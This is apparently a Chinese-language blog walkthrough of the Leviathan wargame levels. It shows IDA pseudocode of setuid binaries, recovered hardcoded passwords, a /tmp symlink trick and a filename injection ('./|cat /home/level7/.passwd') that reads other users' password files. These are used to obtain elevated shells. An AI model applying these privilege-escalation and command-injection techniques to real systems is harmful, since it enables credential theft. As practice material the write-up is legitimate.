Sunday, June 13, 2010

leviathan.intruded.net

上午把这个过了,最容易的一台机器
ssh: leviathan.intruded.net
port: 10101
username: level1
password: leviathan

密码列表(blog里隐掉了)
level1: leviathan
level2: ********
level3: ********
level4: ********
level5: ********
level6: ********
level7: ********
level8: ********
----------------------------------
1
cat .backup/bookmarks.html | grep --color pass
<DT><A HREF="http://nahtaivel.intruded.net/passwordus.html" TEMP: "AFeSdWEf"ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to level2</A>
直接访问
********
----------------------------------
2
/wargame/check
下载下来打开,看到 sex secret god love
这个就是密码,验证,打开一个shell

level2@leviathan:/wargame$ ./check
password: sex secret god love
sh-3.1$ id
uid=1001(level2) gid=1001(level2) euid=1002(level3) groups=1001(level2)
********
----------------------------------
3
level3@leviathan:/wargame$ ln -s /home/level4/.passwd /tmp/file.log
level3@leviathan:/wargame$ ./prog
********
这个纯粹是猜出来的
直接运行提示 Cannot find /tmp/file.log
/tmp是可写不可读的状态

----------------------------------
4
/wargame
ida pro打开,直接伪代码看
int __cdecl do_stuff()
{
  int v1; // [sp+11Dh] [bp-Bh]@1
  int v2; // [sp+121h] [bp-7h]@1
  __int16 v3; // [sp+125h] [bp-3h]@1
  char v4; // [sp+127h] [bp-1h]@1
  char v5; // [sp+1Dh] [bp-10Bh]@1

  v1 = dword_8048737;
  v2 = dword_804873B;
  v3 = word_804873F;
  v4 = byte_8048741;
  fgets(&v5, 256, (FILE *)stdin);
  if ( strcmp(&v5, (const char *)&v1) )
  {
    puts("bzzzzzzzzap. WRONG");
  }
  else
  {
    puts("[You've got shell]!");
    seteuid(0x3ECu);
    system("/bin/sh");
  }
  return 0;
}

点开v1
.rodata:08048737 dword_8048737   dd 706C6E73h            ; DATA XREF: do_stuff+9 r
.rodata:0804873B dword_804873B   dd 746E6972h            ; DATA XREF: do_stuff+11 r
.rodata:0804873F word_804873F    dw 0A66h                ; DATA XREF: do_stuff+19 r
mysql出场了


mysql> select 0x706C6E73;
+------------+
| 0x706C6E73 |
+------------+
| plns       |
+------------+
1 row in set (0.00 sec)

mysql> select 0x746E6972;
+------------+
| 0x746E6972 |
+------------+
| tnir       |
+------------+
1 row in set (0.00 sec)

mysql> select 0x66;
+------+
| 0x66 |
+------+
| f    |
+------+
1 row in set (0.00 sec)

mysql> select reverse('ftnirplns');
+----------------------+
| reverse('ftnirplns') |
+----------------------+
| snlprintf            |
+----------------------+
1 row in set (0.00 sec)
密码是 ********

----------------------------------
5
这关是个算法题?
~/.Trash/bin

Ida pro 打开
int __cdecl main(char a1)
{
  int result; // eax@2
  FILE *v2; // eax@1
  int  r; // [sp+40h] [bp+0h]@1
  int v4; // [sp+3Ch] [bp-4h]@1
  char *v5; // [sp+30h] [bp-10h]@1
  FILE *v6; // [sp+20h] [bp-20h]@1
  unsigned int v7; // [sp+24h] [bp-1Ch]@3
  char v8; // [sp+2Fh] [bp-11h]@4
  signed int v9; // [sp+28h] [bp-18h]@4
  char *v10; // [sp+18h] [bp-28h]@11

  v4 =  r;
  v5 = &a1;
  v2 = fopen("/home/level6/.passwd", (const char *)&unk_80485E8);
  v6 = v2;
  if ( v2 )
  {
    fgets(buf, 256, v6);
    v7 = 0;
    while ( 1 )
    {
      v10 = buf;
      if ( v7 >= strlen(buf) - 1 )
        break;
      v8 = buf[v7];
      v9 = 0;
      while ( v9 <= 7 )
      {
        if ( v8 >= 0 )
          putchar(48);
        else
          putchar(49);
        v8 *= 2;
        ++v9;
      }
      putchar(32);
      ++v7;
    }
    result = putchar(10);
  }
  else
  {
    result = -1;
  }
  return result;
}
执行的结果是
00110110 01101100 01111001 01110110 01001100 01011000 01000011 01000001 00001010

做了个字典:
#include 
#include 

int main(char a1)
{
    char *buf = "01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    int i=0;
    int t=0;
    char c;
    int j=0;

    for (; i<strlen(buf); i++, j++) {
        c = buf[i];
        printf("%c : ", c);
        t = 0;
        while ( t <= 7 ) {
            if ( c >= 0) {
                putchar('0');
            } else {
                putchar('1');
            }

            c *= 2;
            t++;
        }
        if (j%4 == 3) {
            printf(" \n");
        } else {
            printf(" \t");
        }
    }
}
/*
0 : 00110000    1 : 00110001    2 : 00110010    3 : 00110011
4 : 00110100    5 : 00110101    6 : 00110110    7 : 00110111
8 : 00111000    9 : 00111001    0 : 00110000    a : 01100001
b : 01100010    c : 01100011    d : 01100100    e : 01100101
f : 01100110    g : 01100111    h : 01101000    i : 01101001
j : 01101010    k : 01101011    l : 01101100    m : 01101101
n : 01101110    o : 01101111    p : 01110000    q : 01110001
r : 01110010    s : 01110011    t : 01110100    u : 01110101
v : 01110110    w : 01110111    x : 01111000    y : 01111001
z : 01111010    A : 01000001    B : 01000010    C : 01000011
D : 01000100    E : 01000101    F : 01000110    G : 01000111
H : 01001000    I : 01001001    J : 01001010    K : 01001011
L : 01001100    M : 01001101    N : 01001110    O : 01001111
P : 01010000    Q : 01010001    R : 01010010    S : 01010011
T : 01010100    U : 01010101    V : 01010110    W : 01010111
X : 01011000    Y : 01011001    Z : 01011010
*/
查表
00110110 01101100 01111001 01110110 01001100 01011000 01000011 01000001 00001010
********
----------------------------------
6
signed int __cdecl main(char a1)
{
  int  r; // [sp+230h] [bp+0h]@1
  int v3; // [sp+22Ch] [bp-4h]@1
  char *v4; // [sp+224h] [bp-Ch]@1
  char *v5; // [sp+18h] [bp-218h]@1
  int v7; // [sp+24h] [bp-20Ch]@5
  int v8; // [sp+1Ch] [bp-214h]@6

  v3 =  r;
  v4 = &a1;
  v5 = &a1;
  if ( a1 <= 1 )
  {
    puts("*** File Printer ***");
    printf("Usage: %s filename\n", **((_DWORD **)v5 + 1));
    return -1;
  }
  if ( access(*(const char **)(*((_DWORD *)v5 + 1) + 4), 0) )
  {
    puts("You cant have that file...");
    return 1;
  }
  snprintf((char *)&v7, 0x1FFu, "/bin/cat %s", *(_DWORD *)(*((_DWORD *)v5 + 1) + 4));
  system((const char *)&v7);
  return v8;
}
/var/tmp下有几个symlink,但是直接读还是不行。看了看命令的构造,很显然,需要从文件名上动手。
本想自己弄,结果发现/var/tmp下有了

level6@leviathan:/var/tmp$ /wargame/printfile ./\|cat\ /home/level7/.passwd
/bin/cat: ./: Is a directory
********

----------------------------------
7
level7@leviathan:/wargame$ ./sphinx
usage: ./sphinx <4 digit code>
level7@leviathan:/wargame$ ./sphinx 1111
Wrong
第一眼,想写个代码遍历 - -|||

IDA Pro

int __cdecl main(char a1)
{
  int result; // eax@5
  int  r; // [sp+30h] [bp+0h]@1
  int v3; // [sp+2Ch] [bp-4h]@1
  char *v4; // [sp+24h] [bp-Ch]@1
  char *v5; // [sp+10h] [bp-20h]@1
  int v6; // [sp+20h] [bp-10h]@1

  v3 =  r;
  v4 = &a1;
  v5 = &a1;
  v6 = 7123;
  if ( a1 != 2 )
  {
    printf("usage: %s<4 digit code>\n", **((_DWORD **)v5 + 1));
    exit(-1);
  }
  if ( atoi(*(const char **)(*((_DWORD *)v5 + 1) + 4)) == v6 )
  {
    seteuid(0x3EFu);
    result = system("/bin/sh");
  }
  else
  {
    result = puts("Wrong");
  }
  return result;
}

level7@leviathan:/$ /wargame/sphinx 7123
sh-3.1$ id
uid=1006(level7) gid=1006(level7) euid=1007(level8) groups=1006(level7)
脑残了,居然不相信7123是密码

啊啊啊啊a

********
----------------------------------

level8@leviathan:~$ cat CONGRATULATIONS
Well Done, you seem to have used *nix system before, now try something more serious. Your completion string is "Unix is easy!!!".

1 comment:

  1. Thank for your post !
    I have a question :
    you use idapro to disas file but how to use idapro to open files in leviathan.intruded.net? :(

    ReplyDelete